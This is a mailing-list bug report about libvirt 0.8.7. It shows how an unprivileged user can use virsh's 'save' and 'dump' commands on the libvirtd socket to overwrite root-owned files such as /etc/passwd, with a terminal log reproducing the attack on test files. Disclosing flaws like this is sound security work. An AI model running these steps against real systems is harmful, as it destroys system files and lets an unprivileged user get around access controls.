[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

[libvirt] Possible security hole? unprivileged user can use virsh to overwrite sensitive system file

I found there's a way for a unprivileged user to overwrite sensitive system file with virsh, here's how: 1. (as an unprivileged user) start virsh and connect to the r/w socket of libvirtd:
   virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
2. start a guest, then issue 'save' or 'dump' command, giving a sensitive system file path as the <file> parameter, for example, '/etc/passwd';
3. the sensitive system file will be overwritten;

Attached is a test log. I'm using libvirt-0.8.7 on a OpenClient for RHEL 6.1. And latest libvirt code shows the same symptom.

BTW, virsh expands the <file> parameter in step to an absolute path if user-provided is not, and libvirtd interprets it as a local file. IMHO it does not look quite right, especially when the virsh-to-libvirtd connection is remote.

Hong Xiang
[hxiang T420 ~]$ cat /etc/redhat-release 
Red Hat Enterprise Linux Workstation release 6.1 (Santiago)
[hxiang T420 ~]$ cat /etc/openclient-release 
Open Client RHEL 64 3.10 (Gold Master)
[hxiang T420 ~]$ libvirtd --version
libvirtd (libvirt) 0.8.7
[hxiang T420 ~]$ virsh -V
Virsh command line tool of libvirt 0.8.7
See web site at http://libvirt.org/

Compiled with support for:
 Hypervisors: QEmu/KVM LXC ESX Test
 Networking: Remote Daemon Network Bridging Netcf Nwfilter VirtualPort
 Storage: Dir Disk Filesystem SCSI Multipath iSCSI LVM
 Miscellaneous: SELinux Secrets Debug DTrace Readline
[hxiang T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.1
-rw-r--r--. 1 root root 2 Oct 12 11:38 /etc/precious.2
[hxiang T420 ~]$ virsh -c qemu+unix:///system?socket=/var/run/libvirt/libvirt-sock
Welcome to virsh, the virtualization interactive terminal.

Type:  'help' for help with commands
       'quit' to quit

virsh # start fc15
Domain fc15 started

virsh # dump fc15 /etc/precious.1
Domain fc15 dumped to /etc/precious.1

virsh # save fc15 /etc/precious.2
Domain fc15 saved to /etc/precious.2

virsh # 
[hxiang T420 ~]$ ls -l /etc/precious.*
-rw-r--r--. 1 root root 253777159 Oct 12 11:42 /etc/precious.1
-rw-r--r--. 1 root root 257745683 Oct 12 11:42 /etc/precious.2
[hxiang T420 ~]$ 

[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]